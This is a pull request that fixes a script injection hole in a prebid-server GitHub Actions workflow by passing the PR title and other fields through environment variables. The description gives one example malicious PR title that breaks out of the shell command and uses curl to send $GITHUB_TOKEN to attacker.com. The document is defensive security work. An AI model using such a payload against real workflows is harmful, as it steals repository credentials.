### PR TITLE
Fix script injection vulnerability in cross-repo-issue workflow

### DIFF
--- a/.github/workflows/cross-repo-issue.yml
+++ b/.github/workflows/cross-repo-issue.yml
@@ -20,9 +20,15 @@ jobs:
         if: "!contains(github.event.pull_request.labels.*.name, 'do not port') && github.event.pull_request.merged"
         env:
           GITHUB_TOKEN: ${{ steps.generate_token.outputs.token }}
+          PR_NUMBER: ${{ github.event.number }}
+          PR_TITLE: ${{ github.event.pull_request.title }}
+          PR_MERGED_AT: ${{ github.event.pull_request.merged_at }}
         run: |
-          echo -e "A PR was merged over on PBS-Go\n\n- [https://github.com/prebid/prebid-server/pull/${{github.event.number}}](https://github.com/prebid/prebid-server/pull/${{github.event.number}})\n- timestamp: ${{ github.event.pull_request.merged_at}}" > msg
-          export msg=$(cat msg)
-          gh issue create --repo prebid/prebid-server-java --title "Port PR from PBS-Go: ${{ github.event.pull_request.title }}" \
-              --body "$msg" \
+          BODY="A PR was merged over on PBS-Go
+
+          - https://github.com/prebid/prebid-server/pull/${PR_NUMBER}
+          - timestamp: ${PR_MERGED_AT}"
+          gh issue create --repo prebid/prebid-server-java \
+              --title "Port PR from PBS-Go: ${PR_TITLE}" \
+              --body "${BODY}" \
               --label auto


### PR DESCRIPTION
## Summary

- Fix script injection vulnerability in `.github/workflows/cross-repo-issue.yml`
- Pass user-controlled inputs (`PR_TITLE`, `PR_NUMBER`, `PR_MERGED_AT`) via environment variables instead of direct interpolation
- Prevents potential exfiltration of `GITHUB_TOKEN` through malicious PR titles

## Background

The workflow was vulnerable to script injection because `github.event.pull_request.title` was directly interpolated into the shell command. An attacker could craft a malicious PR title like:

```
"; curl -X POST -d "token=$GITHUB_TOKEN" https://attacker.com/steal #
```

This would execute arbitrary commands and potentially exfiltrate the GitHub App token.

## Fix

Changed from direct interpolation:
```yaml
--title "Port PR from PBS-Go: ${{ github.event.pull_request.title }}"
```

To environment variable approach:
```yaml
env:
  PR_TITLE: ${{ github.event.pull_request.title }}
run: |
  gh issue create --title "Port PR from PBS-Go: ${PR_TITLE}"
```

## Reference

- [GitHub Docs: Security hardening for GitHub Actions - Understanding the risk of script injections](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#understanding-the-risk-of-script-injections)

## Test Plan

- [ ] Verify the workflow still creates issues correctly when PRs are merged
- [ ] Confirm that malicious PR titles are now treated as literal strings